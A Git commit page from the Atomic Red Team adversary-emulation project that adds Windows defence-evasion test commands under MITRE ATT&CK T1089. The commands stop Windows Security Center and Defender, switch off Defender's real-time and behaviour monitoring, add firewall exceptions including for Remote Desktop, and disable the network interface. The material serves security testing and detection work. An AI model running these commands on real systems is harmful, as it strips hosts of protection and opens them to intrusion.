security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #114 from infosecn1nja/patch-8

Browse Source 
Update Disabling_Security_Tools.md
This commit is contained in:
caseysmithrc
2018-04-13 07:33:05 -06:00
committed by GitHub
parent 165607d242 ec5af82e6e
commit fab50ebce7
1 changed files with 16 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Defense_Evasion/Disabling_Security_Tools.md
+16 -1
View File
@@ -11,13 +11,28 @@ MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
## Stop Windows Security Center
`net stop wscsvc`
## Add Local Firewall Rule Exceptions : Enable a Program
`netsh advfirewall firewall add rule name="My Application" dir=in action=allow program="C:\MyApp\MyApp.exe" enable=yes`
## Add Local Firewall Rule Exceptions : Enable a Port
`netsh advfirewall firewall add rule name="Open Remote Desktop" protocol=TCP dir=in localport=3389 action=allow`
## Disable The LAN Network Connection
`netsh interface set interface name="Local Area Connection" admin=disabled`
## Stop Windows Defender
### Windows 7/8
`net stop windefend`
### Windows 10
`PS > Set-MpPreference -DisableRealtimeMonitoring $true`
```
PS > Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
PS > Set-MpPreference -DisableIOAVProtection $true -Verbose
PS > Set-MpPreference -DisableBehaviorMonitoring $true -Verbose
PS > Set-MpPreference -DisableIntrusionPreventionSystem $true -Verbose
PS > Set-MpPreference -DisablePrivacyMode $true -Verbose
```
## Disable Default Web Site Logging IIS 7